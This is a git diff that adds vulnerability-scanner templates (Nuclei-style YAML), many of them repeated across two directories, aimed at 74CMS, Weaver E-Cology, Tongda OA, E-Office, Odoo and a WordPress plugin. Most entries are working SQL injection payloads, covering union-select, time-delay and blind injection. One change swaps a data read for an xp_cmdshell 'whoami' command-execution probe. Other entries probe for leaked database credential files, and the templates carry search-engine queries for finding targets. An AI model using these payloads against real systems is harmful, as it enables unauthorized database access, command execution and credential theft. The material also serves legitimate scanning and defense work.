+    max-request: 1
+    fofa-query: app="骑士-74CMS"
+  tags: 74cms,weixin,sqli
+variables:
+  num: '999999999'
+
+http:
+  - raw:
+      - |
+        POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709×tamp=&nonce= HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        ]>&test;111112331%' union select md5({{num}})#
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4b0a00483046022100cea2e8608523d9fe561e07db80006e0d8180bb73866ce3ee77dcdbcbd911aa6002210095f263df205d9637e3943b658e48c91bcffd1e723ed3809ccd177d9283fab7f4:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml b/poc/sql/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml
new file mode 100644
index 0000000000..7d1bcfee4c
--- /dev/null
+++ b/poc/sql/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3
+
+info:
+  name: >
+    amCharts: Charts and Maps <= 1.4.4 - Reflected Cross-Site Scripting via Cross-Site Request Forgery
+  author: topscoder
+  severity: medium
+  description: >
+    The amCharts: Charts and Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'amcharts_javascript' parameter in all versions up to, and including, 1.4.4 due to the ability to supply arbitrary JavaScript a lack of nonce validation on the preview functionality. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3593e8-3840-4db0-8269-61bbcb50d569?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2024-8622
+  metadata:
+    fofa-query: "wp-content/plugins/amcharts-charts-and-maps/"
+    google-query: inurl:"/wp-content/plugins/amcharts-charts-and-maps/"
+    shodan-query: 'vuln:CVE-2024-8622'
+  tags: cve,wordpress,wp-plugin,amcharts-charts-and-maps,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/amcharts-charts-and-maps/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "amcharts-charts-and-maps"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.4.4')
\ No newline at end of file
diff --git a/poc/sql/SQLNet-log.yaml b/poc/sql/SQLNet-log.yaml
new file mode 100644
index 0000000000..edccf5de42
--- /dev/null
+++ b/poc/sql/SQLNet-log.yaml
@@ -0,0 +1,18 @@
+id: sqlnet-log
+
+info:
+  name: sqlnet-log 
+  author: 111xnagashy
+  severity: medium
+  description: internal pages did not enforce an authentication requirement. The log file at /OA_HTML/bin/sqlnet.log disclosed internal Uber IP addresses, hostnames, and one internal username.
+  reference: https://hackerone.com/reports/410187
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/OA_HTML/bin/sqlnet.log"
+    matchers:
+      - type: word
+        words:
+          - "ORA-"
+          - "SQL*Net"
\ No newline at end of file
diff --git a/poc/sql/ecology-oa-file-sqli.yaml b/poc/sql/ecology-oa-file-sqli.yaml
new file mode 100644
index 0000000000..663a02fd95
--- /dev/null
+++ b/poc/sql/ecology-oa-file-sqli.yaml
@@ -0,0 +1,43 @@
+id: ecology-oa-file-sqli
+
+info:
+  name: E-cology FileDownloadForOutDocSQL - SQL Injection
+  author: momika233
+  severity: high
+  description: |
+    e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system
+  reference:
+    - https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,ecology-oa,sqli
+
+http:
+  - raw:
+      - |
+        @timeout: 15s
+        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
+        Host: {{Hostname}}
+
+        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:7'
+      - |
+        @timeout: 35s
+        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
+        Host: {{Hostname}}
+
+        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:15'
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration_1>=7 && status_code_1 == 200'
+          - 'contains(header_1, "ecology_JSessionid=")'
+          - 'duration_2>=15 && status_code_2 == 200'
+          - 'contains(header_2, "ecology_JSessionid=")'
+        condition: and
+
+# digest: 4b0a00483046022100ffe0b0bbdd67b8d72070bd4b0ebcbd93eaed08be7e825664b654c76340c93303022100d0dda143a17d2ccd9570880ebb09784be05f7e5862ad9ed5b60ea6ea2c7e9a15:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/ecology-sqli2.yaml b/poc/sql/ecology-sqli2.yaml
index eb07a123e2..37e6ab9baf 100644
--- a/poc/sql/ecology-sqli2.yaml
+++ b/poc/sql/ecology-sqli2.yaml
@@ -10,7 +10,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=Select%20*%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=exec%20xp_cmd$shell%20%27whoami%27;"
     matchers-condition: and
     matchers:
       - type: status
@@ -18,7 +18,7 @@ requests:
           - 200
       - type: word
         words:
-          - "lastname"
-          - "password"
+          - "output"
+          - "mssqlserver"
         part: body
         condition: and
\ No newline at end of file
diff --git a/poc/sql/mysql-history.yaml b/poc/sql/mysql-history.yaml
new file mode 100644
index 0000000000..3842f59d4e
--- /dev/null
+++ b/poc/sql/mysql-history.yaml
@@ -0,0 +1,54 @@
+id: mysql-history
+
+info:
+  name: Mysql History - File Disclosure
+  author: kazet
+  severity: low
+  description: |
+    The mysql_history file is a history file used by the MySQL command-line client (mysql) to store a record of the SQL commands and statements entered by a user during their interactive MySQL sessions. It serves as a command history for the MySQL client, allowing users to recall and reuse previously executed SQL commands.
+  reference:
+    - http://doc.docs.sk/mysql-refman-5.5/mysql-history-file.html
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"mysql_history"
+  tags: misconfig,disclosure,config
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.mysql_history"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "_HiStOrY_V2_"
+          - "show databases;"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+          - "text/plain"
+          - "filename=\".mysql_"
+
+      - type: word
+        part: response
+        words:
+          - ""
+          - "text/html"
+          - "image/"
+        negative: true
+
+      - type: status
+        status:
+          - 200
+
+# digest: 490a0046304402204a3e73fd4764e2ab60a4edeb79644228fa98d42ac7ccea958bde5dd4a124fbeb02201f70da8af717f2a5d68b47ecbcddc16b8692f9d3e8821a28cdf3f0db6dfe46b6:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/odoo-unprotected-database.yaml b/poc/sql/odoo-unprotected-database.yaml
new file mode 100644
index 0000000000..464768f8b7
--- /dev/null
+++ b/poc/sql/odoo-unprotected-database.yaml
@@ -0,0 +1,32 @@
+id: odoo-unprotected-database
+
+info:
+  name: Odoo - Unprotected Database
+  author: pdteam
+  severity: critical
+  description: |
+    The system has an Odoo application whose database manager is unprotected, indicating potential unauthorized access.
+  remediation: |
+    Implement and enforce proper authentication and access control measures to protect the Odoo database manager.
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: title:"Odoo"
+  tags: odoo,database,unauth,misconfig
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/web/database/manager'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Warning, your Odoo database manager is not protected."
+
+      - type: status
+        status:
+          - 200
+
+# digest: 490a00463044022077bae65be56d0b9e92250e39058f9422f8263d55f5e2764bf87c25263e5d08f002202240a1ef4c069648261141c66f4a3607444e6b9abde00a45e15cca7efd1f1f09:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/sql-server-report-viewer.yaml b/poc/sql/sql-server-report-viewer.yaml
index 25d0450675..0cb1bc83ab 100644
--- a/poc/sql/sql-server-report-viewer.yaml
+++ b/poc/sql/sql-server-report-viewer.yaml
@@ -4,6 +4,7 @@ info:
   name: SQL Server ReportViewer - Exposure
   author: kazet
   severity: high
+  description: SQL Server ReportViewer page exposed.
   reference:
     - https://learn.microsoft.com/en-us/sql/reporting-services/create-deploy-and-manage-mobile-and-paginated-reports?view=sql-server-ver16
   metadata:
@@ -27,5 +28,4 @@ http:
           - "status_code_1 == 200 && status_code_2 != 401"
           - "contains(body, 'Data Source') && contains(body, 'SQL Server Reporting Services')"
         condition: and
-
-# digest: 4b0a00483046022100b740eed8d4c009932dfa1f7cf3eb572e3163d7148296a2a206ea39e0645f1995022100d56aff517c589016472e1ef042f9d557172d13012341acc2dc483910ec6e427b:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221008feccb6f64b565bdc0c250a76bf836e3fa99a59c5a9b7f80327b4f4628fdeaa60221008a23345dd57c7dbbce3370ad35499b7aaf50fe496815d0d9c30740b73e81bccf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/sql/tongda-insert-sqli.yaml b/poc/sql/tongda-insert-sqli.yaml
new file mode 100755
index 0000000000..c963fa5a5b
--- /dev/null
+++ b/poc/sql/tongda-insert-sqli.yaml
@@ -0,0 +1,47 @@
+id: tongda-insert-sqli
+
+info:
+  name: Tongda OA v11.6 Insert Parameter - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    Tongda OA v11.6 insert parameters contain SQL injection vulnerabilities, through which attackers can obtain sensitive database information
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: app="TDXK-通达OA"
+  tags: tongda,sqli,intrusive
+
+http:
+  - raw:
+      - |
+        POST /general/document/index.php/recv/register/insert HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
+      - |
+        POST /general/document/index.php/recv/register/insert HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))>128,1,710)))# =1&_SERVER=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header_1
+        words:
+          - "PHPSESSID="
+          - "register_for/?rid="
+        condition: and
+
+      - type: word
+        part: header_2
+        words:
+          - "register_for/?rid="
+        negative: true
+
+# digest: 4b0a004830460221009ed8e040f9c911e7b4528b68de3d737caf0324411add23a0bf7b5f4313090f09022100c70aafde7c380998799b974261723a1c4a1247cdbb59b5dd156e249be7af06ee:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/tongda-report-func-sqli.yaml b/poc/sql/tongda-report-func-sqli.yaml
new file mode 100755
index 0000000000..8b346b2340
--- /dev/null
+++ b/poc/sql/tongda-report-func-sqli.yaml
@@ -0,0 +1,39 @@
+id: tongda-report-func-sqli
+
+info:
+  name: Tongda OA v11.6 report_bi.func.php - SQL injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    Tongda OA v11.6 report_bi.func.php has a SQL injection vulnerability, and attackers can obtain database information through the vulnerability.
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20report_bi.func.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="TDXK-通达OA"
+  tags: tongda,sqli
+
+http:
+  - raw:
+      - |
+        POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"root@'
+          - '"para":'
+          - '"td_oa"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4a0a0047304502202623ac67b5c9288c847a41c8d90dbd04d224ed78715cc2a7ab9efd4890d6f9bd022100d63e3e11d77b2dfa8cfe2eede3fa56019d78cc62312fac8445b11e6bfa15c563:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/weaver-checkserver-sqli.yaml b/poc/sql/weaver-checkserver-sqli.yaml
new file mode 100644
index 0000000000..3610ea5855
--- /dev/null
+++ b/poc/sql/weaver-checkserver-sqli.yaml
@@ -0,0 +1,32 @@
+id: weaver-checkserver-sqli
+
+info:
+  name: Ecology OA CheckServer - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    Ecology OA system improperly filters incoming data from users, resulting in a SQL injection vulnerability. Remote and unauthenticated attackers can use this vulnerability to conduct SQL injection attacks and steal sensitive database information.
+  reference:
+    - https://stack.chaitin.com/techblog/detail?id=81
+    - https://github.com/lal0ne/vulnerability/blob/main/%E6%B3%9B%E5%BE%AE/E-Cology/CheckServer/README.md
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="泛微-协同办公OA"
+  tags: weaver,ecology,sqli
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mobile/plugin/CheckServer.jsp?type=mobileSetting"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains_all(header, 'application/json','ecology_')"
+          - "contains(body, 'error\":\"system error') && !contains(body, 'securityIntercept')"
+        condition: and
+
+# digest: 4a0a0047304502203971c4e5664482479370bb1b1f56e4615b5a7d7b64f74ea6104ba1161c63cc3e022100c1e6508ec3615a4313c8cf683984d8424cd47b0d3b340e04a0e81cb5f713e4cf:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/weaver-ecology-getsqldata-sqli.yaml b/poc/sql/weaver-ecology-getsqldata-sqli.yaml
new file mode 100755
index 0000000000..e187956800
--- /dev/null
+++ b/poc/sql/weaver-ecology-getsqldata-sqli.yaml
@@ -0,0 +1,40 @@
+id: weaver-ecology-getsqldata-sqli
+
+info:
+  name: Weaver E-Cology `getsqldata` - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    When the getSqlData interface of the Panwei e-cology OA system uses the mssql database, the built-in SQL statements are not spliced strictly, resulting in a SQL injection vulnerability.
+  reference:
+    - https://github.com/Wrin9/weaverOA_sql_RCE/blob/14cca7a6da7a4a81e7c7a7016cb0da75b8b290bc/weaverOA_sql_injection_POC_EXP.py#L46
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql="
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: word
+        part: body
+        words:
+          - '{"api_status":'
+          - '"status":true}'
+        condition: and
+
+# digest: 490a00463044022030ad64fd9961684672663bf926bddb0391c94c7fdc8811b4fade9b5f2a1f908b022006c35ef700880eefd6d5e1e757558e4ca0cb156164165191be70c8bec7479fdf:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/weaver-ecology-hrmcareer-sqli.yaml b/poc/sql/weaver-ecology-hrmcareer-sqli.yaml
new file mode 100755
index 0000000000..92cef0c85e
--- /dev/null
+++ b/poc/sql/weaver-ecology-hrmcareer-sqli.yaml
@@ -0,0 +1,36 @@
+id: weaver-ecology-hrmcareer-sqli
+
+info:
+  name: Weaver E-Cology HrmCareerApplyPerView - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    There is a SQL injection vulnerability in the HrmCareerApplyPerView.jsp file of Panwei OA E-Cology. An attacker can obtain sensitive files in the server database through the vulnerability.
+  reference:
+    - https://github.com/ibaiw/2023Hvv/blob/556de69ffc370fd9827e2cf5027373543e2513d4/%E6%B3%9B%E5%BE%AE%20HrmCareerApplyPerView%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1#L3
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),4,5,6,7"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4a0a004730450221008a69da6dd9b0443019eb595747f9261d574b5a66de842c6185e142a5283fac49022003c7581a2daeebea8bd4eb05c1fc91f8676c9a2a46da1bc7b1e0717fa27fbca8:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql/weaver-mysql-config-info-leak.yaml b/poc/sql/weaver-mysql-config-info-leak.yaml
new file mode 100644
index 0000000000..85dad0d119
--- /dev/null
+++ b/poc/sql/weaver-mysql-config-info-leak.yaml
@@ -0,0 +1,30 @@
+id: weaver-mysql-config-exposure
+
+info:
+  name: OA E-Office mysql_config.ini - Information Disclosure
+  author: SleepingBag945
+  severity: high
+  description: |
+    E-Office mysql_config.ini file can be directly accessed, leaking database account password and other information
+  reference:
+    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA%20E-Office%20mysql_config.ini%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="泛微-EOffice"
+  tags: ecology,weaver,oa,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mysql_config.ini"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(header,"text/plain")'
+          - 'contains_all(body,"datapassword", "datauser")'
+        condition: and
+
+# digest: 4a0a00473045022003d14acb438bcd3ddfaab392c67ae2d0fd30ddbe80da964d403b0403eee025dd022100d6c9d8d5b6864cd317a1b28d3c9a5eeb35e4a0bbfb64a43f01c526d2a5e63070:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql_injection/74cms-weixin-sqli.yaml b/poc/sql_injection/74cms-weixin-sqli.yaml
new file mode 100644
index 0000000000..6508ef3296
--- /dev/null
+++ b/poc/sql_injection/74cms-weixin-sqli.yaml
@@ -0,0 +1,39 @@
+id: 74cms-weixin-sqli
+
+info:
+  name: 74CMS weixin.php - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    There is a libxml_disable_entity_loader function to prevent XML eXternal Entity Injection, but this function needs to be customized by the user. If the user does not customize it, there will be no filtering, which leads to SQL injection vulnerabilities.
+  reference:
+    - https://cn-sec.com/archives/25900.html
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="骑士-74CMS"
+  tags: 74cms,weixin,sqli
+variables:
+  num: '999999999'
+
+http:
+  - raw:
+      - |
+        POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709×tamp=&nonce= HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        ]>&test;111112331%' union select md5({{num}})#
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4b0a00483046022100cea2e8608523d9fe561e07db80006e0d8180bb73866ce3ee77dcdbcbd911aa6002210095f263df205d9637e3943b658e48c91bcffd1e723ed3809ccd177d9283fab7f4:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql_injection/SQLNet-log.yaml b/poc/sql_injection/SQLNet-log.yaml
new file mode 100644
index 0000000000..edccf5de42
--- /dev/null
+++ b/poc/sql_injection/SQLNet-log.yaml
@@ -0,0 +1,18 @@
+id: sqlnet-log
+
+info:
+  name: sqlnet-log 
+  author: 111xnagashy
+  severity: medium
+  description: internal pages did not enforce an authentication requirement. The log file at /OA_HTML/bin/sqlnet.log disclosed internal Uber IP addresses, hostnames, and one internal username.
+  reference: https://hackerone.com/reports/410187
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/OA_HTML/bin/sqlnet.log"
+    matchers:
+      - type: word
+        words:
+          - "ORA-"
+          - "SQL*Net"
\ No newline at end of file
diff --git a/poc/sql_injection/ecology-oa-file-sqli.yaml b/poc/sql_injection/ecology-oa-file-sqli.yaml
new file mode 100644
index 0000000000..663a02fd95
--- /dev/null
+++ b/poc/sql_injection/ecology-oa-file-sqli.yaml
@@ -0,0 +1,43 @@
+id: ecology-oa-file-sqli
+
+info:
+  name: E-cology FileDownloadForOutDocSQL - SQL Injection
+  author: momika233
+  severity: high
+  description: |
+    e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system
+  reference:
+    - https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,ecology-oa,sqli
+
+http:
+  - raw:
+      - |
+        @timeout: 15s
+        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
+        Host: {{Hostname}}
+
+        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:7'
+      - |
+        @timeout: 35s
+        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
+        Host: {{Hostname}}
+
+        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:15'
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration_1>=7 && status_code_1 == 200'
+          - 'contains(header_1, "ecology_JSessionid=")'
+          - 'duration_2>=15 && status_code_2 == 200'
+          - 'contains(header_2, "ecology_JSessionid=")'
+        condition: and
+
+# digest: 4b0a00483046022100ffe0b0bbdd67b8d72070bd4b0ebcbd93eaed08be7e825664b654c76340c93303022100d0dda143a17d2ccd9570880ebb09784be05f7e5862ad9ed5b60ea6ea2c7e9a15:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql_injection/ecology-sqli2.yaml b/poc/sql_injection/ecology-sqli2.yaml
index eb07a123e2..37e6ab9baf 100644
--- a/poc/sql_injection/ecology-sqli2.yaml
+++ b/poc/sql_injection/ecology-sqli2.yaml
@@ -10,7 +10,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=Select%20*%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=exec%20xp_cmd$shell%20%27whoami%27;"
     matchers-condition: and
     matchers:
       - type: status
@@ -18,7 +18,7 @@ requests:
           - 200
       - type: word
         words:
-          - "lastname"
-          - "password"
+          - "output"
+          - "mssqlserver"
         part: body
         condition: and
\ No newline at end of file
diff --git a/poc/sql_injection/mysql-history.yaml b/poc/sql_injection/mysql-history.yaml
new file mode 100644
index 0000000000..3842f59d4e
--- /dev/null
+++ b/poc/sql_injection/mysql-history.yaml
@@ -0,0 +1,54 @@
+id: mysql-history
+
+info:
+  name: Mysql History - File Disclosure
+  author: kazet
+  severity: low
+  description: |
+    The mysql_history file is a history file used by the MySQL command-line client (mysql) to store a record of the SQL commands and statements entered by a user during their interactive MySQL sessions. It serves as a command history for the MySQL client, allowing users to recall and reuse previously executed SQL commands.
+  reference:
+    - http://doc.docs.sk/mysql-refman-5.5/mysql-history-file.html
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"mysql_history"
+  tags: misconfig,disclosure,config
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.mysql_history"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "_HiStOrY_V2_"
+          - "show databases;"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+          - "text/plain"
+          - "filename=\".mysql_"
+
+      - type: word
+        part: response
+        words:
+          - ""
+          - "text/html"
+          - "image/"
+        negative: true
+
+      - type: status
+        status:
+          - 200
+
+# digest: 490a0046304402204a3e73fd4764e2ab60a4edeb79644228fa98d42ac7ccea958bde5dd4a124fbeb02201f70da8af717f2a5d68b47ecbcddc16b8692f9d3e8821a28cdf3f0db6dfe46b6:922c64590222798bb761d5b6d8e72950
diff --git a/poc/sql_injection/sql-server-report-viewer.yaml b/poc/sql_injection/sql-server-report-viewer.yaml
index 25d0450675..0cb1bc83ab 100644
--- a/poc/sql_injection/sql-server-report-viewer.yaml
+++ b/poc/sql_injection/sql-server-report-viewer.yaml
@@ -4,6 +4,7 @@ info:
   name: SQL Server ReportViewer - Exposure
   author: kazet
   severity: high
+  description: SQL Server ReportViewer page exposed.
   reference:
     - https://learn.microsoft.com/en-us/sql/reporting-services/create-deploy-and-manage-mobile-and-paginated-reports?view=sql-server-ver16
   metadata:
@@ -27,5 +28,4 @@ http:
           - "status_code_1 == 200 && status_code_2 != 401"
           - "contains(body, 'Data Source') && contains(body, 'SQL Server Reporting Services')"
         condition: and
-
-# digest: 4b0a00483046022100b740eed8d4c009932dfa1f7cf3eb572e3163d7148296a2a206ea39e0645f1995022100d56aff517c589016472e1ef042f9d557172d13012341acc2dc483910ec6e427b:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221008feccb6f64b565bdc0c250a76bf836e3fa99a59c5a9b7f80327b4f4628fdeaa60221008a23345dd57c7dbbce3370ad35499b7aaf50fe496815d0d9c30740b73e81bccf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/sql_injection/tongda-insert-sqli.yaml b/poc/sql_injection/tongda-insert-sqli.yaml
new file mode 100755
index 0000000000..c963fa5a5b
--- /dev/null
+++ b/poc/sql_injection/tongda-insert-sqli.yaml
@@ -0,0 +1,47 @@
+id: tongda-insert-sqli
+
+info:
+  name: Tongda OA v11.6 Insert Parameter - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    Tongda OA v11.6 insert parameters contain SQL injection vulnerabilities, through which attackers can obtain sensitive database information
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: app="TDXK-通达OA"
+  tags: tongda,sqli,intrusive
+
+http:
+  - raw:
+      - |
+        POST /general/document/index.php/recv/register/insert HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
+      - |
+        POST /general/document/index.php/recv/register/insert HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))>128,1,710)))# =1&_SERVER=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header_1
+        words:
+          - "PHPSESSID="
+          - "register_for/?rid="
+        condition: and
+
+      - type: word
+        part: header_2
+        words:
+          - "register_for/?rid="
+        negative: true
+
+# digest: 4b0a004830460221009ed8e040f9c911e7b4528b68de3d737caf0324411add23a0bf7b5f4313090f09022100c70aafde7c380998799b974261723a1c4a1247cdbb59b5dd156e249be7af06ee:922c64590222798bb761d5b6d8e72950
